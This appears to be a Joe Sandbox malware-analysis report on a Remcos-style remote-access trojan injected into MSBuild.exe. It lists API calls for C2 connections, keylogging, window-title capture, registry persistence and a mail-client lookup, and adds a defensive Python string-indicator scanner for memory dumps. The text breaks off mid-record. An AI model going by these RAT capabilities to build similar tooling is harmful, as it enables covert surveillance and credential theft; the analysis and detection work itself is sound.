• Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
• Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
• Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 00409E62
  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
• GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
• String ID: @CG$@CG$XCG$XCG$xAG$xAG
• API String ID: 3795512280-3163867910
• Opcode ID: 011bd7a893169c3b8833ad9f51b270e3128e7b6ab554ae5cec31d1ab042eb71a
• Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
• Opcode Fuzzy Hash: 011bd7a893169c3b8833ad9f51b270e3128e7b6ab554ae5cec31d1ab042eb71a
• Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

Control-flow Graph

                                                                                                                                            control_flow_graph 1384 40428c-4042ad connect 1385 4043e1-4043e5 1384->1385 1386 4042b3-4042b6 1384->1386 1389 4043e7-4043f5 WSAGetLastError 1385->1389 1390 40445f 1385->1390 1387 4043da-4043dc 1386->1387 1388 4042bc-4042bf 1386->1388 1391 404461-404465 1387->1391 1392 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1388->1392 1393 4042eb-4042f5 call 420151 1388->1393 1389->1390 1394 4043f7-4043fa 1389->1394 1390->1391 1392->1393 1404 404306-404313 call 420373 1393->1404 1405 4042f7-404301 1393->1405 1397 404439-40443e 1394->1397 1398 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1394->1398 1400 404443-40445c call 401f66 * 2 call 41a686 1397->1400 1398->1390 1400->1390 1418 404315-404338 call 401f66 * 2 call 41a686 1404->1418 1419 40434c-404357 call 420f34 1404->1419 1405->1400 1445 40433b-404347 call 420191 1418->1445 1430 404389-404396 call 4202ea 1419->1430 1431 404359-404387 call 401f66 * 2 call 41a686 call 420592 1419->1431 1441 404398-4043bb call 401f66 * 2 call 41a686 1430->1441 1442 4043be-4043d7 CreateEventW * 2 1430->1442 1431->1445 1441->1442 1442->1387 1445->1390
APIs
• connect.WS2_32(?,00F1A798,00000010), ref: 004042A5
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
• WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
• Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
• Opcode Fuzzy Hash: 4bca7d416cb3b09075a25b85a3234a820d3ab4dd462292ab93703bc931394468
• Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

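The records above carry the strings that distinguish this payload from the MSBuild.exe host it was injected into: the status-log and version strings ("Connected | ", "TLS On ", "5.3.0 Pro", the "Rmc-QM0FWK" identifier and the MSBuild.exe path) in the function around 00414028; the `/stext "` argument in the function at 00411C81, which sits next to repeated Sleep and DeleteFileW calls; the "Foxmail" lookup under ProgramFiles in the second module at 10000000; and the TLS-handshake failure strings in the connect routine at 0040428C. As an added example that is not part of the Joe Sandbox report or of the sample, the Python below turns those string lists into an offline triage scanner for a raw process memory dump. The group labels, the generalised patterns for the version, the "Rmc-" identifier and the host path, and the SAMPLE_DUMP bytes are constructed for this example; only the literal strings come from the report.

```python
"""Indicator-string triage over a raw process memory dump (Remcos-style RAT).

Added illustration for this report; not Joe Sandbox code and not part of the
analysed sample. It extracts printable ASCII strings from a dump and matches
them against the string groups the disassembly records attribute to specific
functions. Group labels, the generalised regexes and SAMPLE_DUMP are this
example's own constructions.
"""
from __future__ import annotations

import json
import re
import sys

# Literal strings copied from the report's "String ID" lists, keyed by an
# assumed label for the function they were found in.
INDICATORS = {
    "status_log": [            # 00414028: socket/TLS status log fragments
        "Connected | ", "Connecting | ", "Disconnected",
        "Connection Error: Unable to create socket", "TLS On ", "TLS Off",
    ],
    "tls_errors": [            # 0040428C: connect() and TLS handshake failures
        "Connection Failed: ", "Connection Refused", "TLS Authentication Failed",
        "TLS Error 1", "TLS Error 2", "TLS Error 3", "TLS Handshake... |",
    ],
    "helper_exec": ['/stext "'],          # 00411C81: helper invoked with /stext
    "mail_client_lookup": ["Foxmail"],    # 10001434: Foxmail under ProgramFiles
}

# Generalised from single strings on the page ("5.3.0 Pro", "Rmc-QM0FWK" and
# the MSBuild.exe host path); treating them as patterns is an assumption.
VERSION_RE = re.compile(r"\d+\.\d+\.\d+ Pro")
RMC_ID_RE = re.compile(r"Rmc-[A-Za-z0-9]{4,}")
EXE_PATH_RE = re.compile(r"[A-Za-z]:\\(?:[^\\\x00\"]+\\)+[\w.]+\.exe")


def ascii_strings(buf: bytes, min_len: int = 4) -> list[str]:
    """Runs of printable ASCII at least min_len bytes long, like strings(1)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, buf)]


def _first(regex: re.Pattern, strings: list[str]) -> str | None:
    """First regex match across the extracted strings, or None."""
    for s in strings:
        m = regex.search(s)
        if m:
            return m.group()
    return None


def scan(buf: bytes) -> dict:
    """Match extracted strings against INDICATORS and the regex patterns."""
    strings = ascii_strings(buf)
    groups: dict[str, list[str]] = {}
    for label, needles in INDICATORS.items():
        hit = {n for n in needles if any(n in s for s in strings)}
        if hit:
            groups[label] = sorted(hit)
    return {
        "groups": groups,
        "version": _first(VERSION_RE, strings),
        "rmc_id": _first(RMC_ID_RE, strings),
        "host_paths": sorted({m.group() for s in strings
                              for m in EXE_PATH_RE.finditer(s)}),
    }


def verdict(result: dict) -> str:
    """Status strings plus a version or Rmc- identifier is the strong signal;
    anything else is only a partial match that deserves a closer look."""
    groups = result["groups"]
    if "status_log" in groups and (result["version"] or result["rmc_id"]):
        return "remcos-like: status strings plus version/Rmc- identifier"
    if groups:
        return "partial: " + ", ".join(sorted(groups))
    return "no indicators"


# Constructed stand-in for a dump: the report's strings with NUL separators
# and some non-printable filler between them.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"5.3.0 Pro\x00Rmc-QM0FWK\x00"
    + b"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe\x00"
    + b"\x90\x90\xcc\x00" * 4
    + b"Connected | \x00Connecting | \x00TLS On \x00TLS Off\x00"
    + b"Connection Error: Unable to create socket\x00"
    + b"TLS Handshake... |\x00TLS Error 2\x00"
    + b'/stext "\x00Foxmail\x00'
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    report = scan(data)
    report["verdict"] = verdict(report)
    print(json.dumps(report, indent=2))
```

Run it against a real dump with `python scan.py <dump.bin>`; with no argument it scans the constructed SAMPLE_DUMP. The verdict only says which string groups are present in the region, which is a reason to pull the full report (configuration, C2 addresses, injected-process lineage), not a classification on its own.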
Control-flow Graph

APIs
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
• CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
• closesocket.WS2_32(000000FF), ref: 0040481F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
• SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
• SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3658366068-0
                                                                                                                                            • Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                            • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                                                                            • Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
                                                                                                                                            • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

Control-flow Graph

APIs
• __Init_thread_footer.LIBCMT ref: 0040A456
• Sleep.KERNEL32(000001F4), ref: 0040A461
• GetForegroundWindow.USER32 ref: 0040A467
• GetWindowTextLengthW.USER32(00000000), ref: 0040A470
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
• Sleep.KERNEL32(000003E8), ref: 0040A574
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
• Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
• Opcode Fuzzy Hash: 40dc83a074cb538ad83ecf649c27d5a724cb82695593143808d24998f610649e
• Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
• Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
• Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
• Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

Control-flow Graph

APIs
• InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
• InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
• InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
• InternetCloseHandle.WININET(00000000), ref: 0041A5B3
• InternetCloseHandle.WININET(00000000), ref: 0041A5B6
Strings
• http://geoplugin.net/json.gp, xrefs: 0041A54E
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileRead
• String ID: http://geoplugin.net/json.gp
• API String ID: 3121278467-91888290
• Opcode ID: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
• Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
• Opcode Fuzzy Hash: 08bf1114c47a89f5108f7250f1a6636181e558f0e019b3e6eb8e3cc4f37dd347
• Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6
APIs
  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
• StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Process$CloseCurrentOpenQueryValueWow64
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 782494840-2070987746
• Opcode ID: 380e0d5536f16be207b79848a76edd497ebed83e63ff7fe5043507d4c2edcc5c
• Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
• Opcode Fuzzy Hash: 380e0d5536f16be207b79848a76edd497ebed83e63ff7fe5043507d4c2edcc5c
• Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE
APIs
• GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
• Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
• CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: `AG
• API String ID: 1958988193-3058481221
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
• RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
• RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: HgF$pth_unenc
• API String ID: 1818849710-3662775637
APIs
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
APIs
• GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
APIs
• send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
• WaitForSingleObject.KERNEL32(000002C4,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
• SetEvent.KERNEL32(000002C4,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID: LAL
• API String ID: 3963590051-3302426157
APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
• RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
APIs
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3604237281-0
                                                                                                                                            • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                            • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                            • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                            • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                                            Memory Dump Source
